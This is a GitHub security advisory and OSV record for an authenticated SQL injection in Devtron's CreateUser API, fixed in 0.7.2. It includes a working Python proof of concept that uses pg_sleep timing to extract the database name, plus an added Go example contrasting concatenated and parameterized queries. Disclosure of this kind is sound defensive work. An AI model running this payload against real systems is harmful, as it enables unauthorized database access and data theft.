ghsa-q78v-cv36-8fxj
Vulnerability from github
Published
2024-11-07 17:14
Modified
2024-11-07 19:29
Summary
Devtron has SQL Injection in CreateUser API
Details

Summary

An authenticated user with only minimal permissions can exploit a SQL injection to execute attacker-controlled SQL statements against the backing database via the CreateUser API (/orchestrator/user).

Details

The API is CreateUser (/orchestrator/user).

The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104

The userInfo (line 104) parameter can be controlled by users.

The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038

The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.

The user must be authenticated but needs only minimal permissions: [screenshot in the original advisory]
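The bug class in isolation, as an added example that is not Devtron's code: a hypothetical role-filter lookup that interpolates the request's `entity` and `accessType` fields into SQL with `fmt.Sprintf`, beside the same lookup with bind parameters. The `RoleFilter` type, the `roles` table and column names, and the `statementCount` helper are assumptions for illustration; the payload is the shape the PoC in this advisory sends.

```go
package main

import "fmt"

// RoleFilter stands in for one entry of the CreateUser body's roleFilters.
// Hypothetical type for illustration; not Devtron's.
type RoleFilter struct {
	Entity     string
	AccessType string
}

// vulnerableRoleQuery reproduces the bug class: request fields are interpolated
// into the SQL text, so a single quote in AccessType closes the literal and the
// rest of the value is parsed as SQL. Table and column names are assumed.
func vulnerableRoleQuery(f RoleFilter) string {
	return fmt.Sprintf(
		"SELECT id FROM roles WHERE entity = '%s' AND access_type = '%s'",
		f.Entity, f.AccessType)
}

// safeRoleQuery keeps the SQL text constant and hands the request fields to the
// driver as bind parameters ($1, $2 in PostgreSQL), so they are only ever
// compared as values and never parsed as SQL.
func safeRoleQuery(f RoleFilter) (string, []any) {
	return "SELECT id FROM roles WHERE entity = $1 AND access_type = $2",
		[]any{f.Entity, f.AccessType}
}

// statementCount counts ';' outside single-quoted literals as a rough measure of
// how many statements the text would be parsed as. Illustrative, not a SQL lexer.
func statementCount(sql string) int {
	n, inQuote := 1, false
	for i := 0; i < len(sql); i++ {
		switch sql[i] {
		case '\'':
			inQuote = !inQuote
		case ';':
			if !inQuote {
				n++
			}
		}
	}
	return n
}

func main() {
	// Same payload shape as the advisory's PoC: close the literal, append a
	// statement, comment out the remainder of the original query.
	f := RoleFilter{Entity: "chart-group", AccessType: "'; select pg_sleep(1) --"}

	unsafe := vulnerableRoleQuery(f)
	fmt.Printf("concatenated (%d statements): %s\n", statementCount(unsafe), unsafe)

	text, args := safeRoleQuery(f)
	fmt.Printf("parameterized (%d statement): %s  args=%q\n", statementCount(text), text, args)
}
```

With the concatenated form the payload turns one SELECT into two statements, the second being the attacker's `pg_sleep(1)`; with bind parameters the same bytes travel as a value and the text stays a single statement. Field validation (for example an allow-list of permitted `accessType` values) is worth adding on top, but it is the parameterization that removes the injection.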

PoC

Demonstrate a blind SQL injection to retrieve the database name:

```
import requests
import time
import string
import argparse

def blind(ip, token, query):
    url = f"http://{ip}/orchestrator/user"
    headers = {"token": token}
    entity = "chart-group"
    # Close the quoted literal, append the attacker's statement, comment out the rest.
    payload = f"'; {query} --"

    data = {"id": 111, "email_id": "abcd123@126.com", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": ""
    start = time.time()
    res = requests.post(url, headers=headers, json = data)
    end = time.time()
    #print(res.content)
    # Time-based oracle: a response slower than 1s means pg_sleep(1) ran.
    if(end - start > 1):
        return True
    return False

def main(ip, token):
    chs = string.printable
    result = ""
    is_end = False
    i = 1
    # Recover the database name one character position at a time.
    while(not is_end):
        is_end = True
        for ch in chs:
            if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")):
                print(ch)
                result += ch
                is_end = False
                break
        i += 1
    print(result)

if __name__ == "__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument("--ip", "-i", type=str, help="Target IP")
    argparser.add_argument("--token", "-t", type=str, help="API TOKEN")
    args = argparser.parse_args()
    main(args.ip, args.token)
```

A debugger breakpoint confirms that the injected SQL statement reaches the database: [screenshot in the original advisory]

The database name recovered by the blind extraction: [screenshot in the original advisory]

Impact

Authenticated SQL injection against the Devtron orchestrator database. The reporters' tests indicate that the latest release at the time of the report was affected; the advisory lists versions before 0.7.2 as affected.

The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.



{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/devtron-labs/devtron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-45794"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-07T17:14:04Z",
    "nvd_published_at": "2024-11-07T18:15:17Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).\n\n### Details\nThe API is CreateUser (/orchestrator/user).\n\nThe function to read user input is:\nhttps://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104\n\nThe userInfo (line 104) parameter can be controlled by users.\n\nThe SQL injection can happen in the code:\nhttps://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038\n\nThe query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.\n\nThe user should be authenticated but only needs minimum permissions:\n![image](https://github.com/user-attachments/assets/08ba940e-33a8-408d-9a1e-9cd1504b95c5)\n\n\n### PoC\n\nDemonstrate a blind SQL injection to retrieve the database name:\n\n```\nimport requests\nimport time\nimport string\nimport argparse\n\ndef blind(ip, token, query):\n    url = f\"http://{ip}/orchestrator/user\"\n    headers = {\"token\": token}\n    entity = \"chart-group\"\n    payload = f\"\u0027; {query} --\"\n\n    data = {\"id\": 111, \"email_id\": \"abcd123@126.com\", \"superAdmin\": False, \"roleFilters\":[{\"team\":\"\", \"environment\":\"\", \"action\": \"\", \"entity\": entity, \"accessType\": payload}]} #\"EntityName\": \"test\", \"AccessType\": \"test\", \"Cluster\": \"\",\\\"NameSpace\": \"devtroncd\", \"Group\": \"\", \"Kind\": \"\", \"Resource\": \"\", \"Workflow\": \"\"\n    start = time.time()\n    res = requests.post(url, headers=headers, json = data)\n    end = time.time()\n    #print(res.content)\n    if(end - start \u003e 1):\n        return True\n    return False\n\ndef main(ip, token):\n    chs = string.printable\n    result = \"\"\n    is_end = False\n    i = 1\n    while(not is_end):\n        is_end = True\n        for ch in chs:\n            if(blind(ip, token, f\"select case when substring(datname,{i},1)=\u0027{ch}\u0027 then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;\")):\n                print(ch)\n                result += ch\n                is_end = False\n                break\n        i += 1\n    print(result)\n\nif __name__ == \"__main__\":\n    argparser = argparse.ArgumentParser()\n    argparser.add_argument(\"--ip\", \"-i\", type=str, help=\"Target IP\")\n    argparser.add_argument(\"--token\", \"-t\", type=str, help=\"API TOKEN\")\n    args = argparser.parse_args()\n    main(args.ip, args.token)\n```\n\nThe debugging breakpoint indicated that the malicious SQL query was executed:\n![image](https://github.com/user-attachments/assets/c9067360-8fb3-4d64-82e9-3af1e5e60969)\n\nWe can see that we can get the database name:\n![image](https://github.com/user-attachments/assets/29d5d969-876a-452d-be7f-8984d2a28c25)\n\n\n### Impact\nSQL injection vulnerability. Our tests indicate that the latest version is affected.\n\nThe reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.\n",
  "id": "GHSA-q78v-cv36-8fxj",
  "modified": "2024-11-07T19:29:30Z",
  "published": "2024-11-07T17:14:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devtron-labs/devtron/security/advisories/GHSA-q78v-cv36-8fxj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45794"
    },
    {
      "type": "WEB",
      "url": "https://github.com/devtron-labs/devtron/commit/1540271bd777b6bccd288e513a9070d8f04b6056"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devtron-labs/devtron"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Devtron has SQL Injection in CreateUser API"
}

